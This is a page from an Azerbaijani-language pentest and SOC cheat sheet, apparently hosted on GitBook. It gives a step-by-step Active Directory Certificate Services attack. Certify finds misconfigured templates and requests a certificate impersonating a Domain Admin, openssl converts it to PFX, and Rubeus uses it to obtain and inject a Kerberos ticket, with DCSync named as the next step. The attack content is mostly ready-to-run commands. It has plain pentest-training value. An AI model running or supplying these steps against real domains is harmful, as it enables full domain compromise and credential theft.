Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page

Was this helpful?

  1. AD Pentesting
  2. Domain Privilege Escalation

Active Directory Certificate Services

PreviousSID History AbuseNextDomain Persistence

Last updated 1 year ago

Was this helpful?

ADCS nədir?

Active Directory Sertifikat Xidmətləri (AD CS) Windows Server-də bir komponentdir və təşkilatlara ictimai və şəxsi açar infrastrukturu təqdim edən sertifikat orqanı (CA) xidmətidir. AD CS sertifikat əsaslı təhlükəsizliyi aktivləşdirmək və idarə etmək üçün istifadə olunur.

AD CS zəifliyin yoxlanılması üçün toolundan istifadə olunur.

.\Certify.exe find /vulnerable /quiet

msPKI-Certificates-Name-Flag dəyərinin "ENROLLEE_SUPPLIES_SUBJECT" olaraq təyin edildiyinə və Qeydiyyat Hüquqlarının Domain/Authenticated İstifadəçilərə icazə verdiyinə əmin olun. Əlavə olaraq, pkiextendedkeyusage parametrinin "Müştəri Doğrulaması" dəyərini ehtiva etdiyini və həmçinin "Səlahiyyətli İmzalar Tələb olunur" parametrinin 0-a təyin olunduğunu yoxlayın.

Bu istismar yalnız ona görə işləyir ki, bu parametrlər server/müştəri autentifikasiyasına imkan verir, yəni təcavüzkar Domen Admininin ("DA") UPN-ni təyin edə və identifikasiyanı saxtalaşdırmaq üçün ələ keçirilən sertifikatdan Rubeus ilə istifadə edə bilər.

Əgər Domain Admini Qorunan İstifadəçilər qrupundadırsa, istismar nəzərdə tutulduğu kimi işləməyə bilər. Hədəf etmək üçün Domain Admini seçməzdən əvvəl yoxlayın.

Sertifikatla DA-nın Hesab Sertifikatı tələb edin.

.\Certify.exe request /template:<Template Name> /quiet /ca:"<CA Name>" /domain:<domain.com> /path:CN=Configuration,DC=<domain>,DC=com /altname:<Domain Admin AltName> /machine

Bu, əlaqəli DA hesabı üçün etibarlı sertifikatı qaytarmalıdır.

Eksport edilmiş cert.pem və cert.key faylları END RSA PRIVATE KEY və BEGIN CERTIFICATE arasında bir boşluq olmaqla vahid cert.pem faylında birləşdirilməlidir.

cert.pem nümunə

-----BEGIN RSA PRIVATE KEY-----
BIIEogIBAAk15x0ID[...]
[...]
[...]
-----END RSA PRIVATE KEY-----

-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
[...]
-----END CERTIFICATE-----

PKCS 12 Formatına çevirmək üçün openssl-dən istifadə edin

Openssl əmri sertifikat faylını PKCS #12 formatına çevirmək üçün istifadə edilə bilər (sizdən istədiyiniz hər hansı bir ixrac parolunu daxil etməyiniz tələb oluna bilər).

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

cert.pfx faylı ixrac edildikdən sonra onu təhlükəyə məruz qalmış hosta yükləyin (bu, Powershell, SMB, certutil.exe, Cobalt Strike-in yükləmə funksiyası və s. kimi müxtəlif yollarla edilə bilər).

.\Rubeus.exe asktht /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt

Bu, uğurla idxal edilmiş biletlə nəticələnməlidir ki, bu da təcavüzkarın DCSync hücumu kimi DA istifadəçi kontekstində müxtəlif zərərli fəaliyyətlər həyata keçirməsinə imkan verir.

cert.pfx faylı pozulmuş hosta yükləndikdən sonra yaddaşa idxal olunacaq DA hesabı üçün Kerberos TGT tələb etmək üçün istifadə edilə bilər.

Certify
Rubeus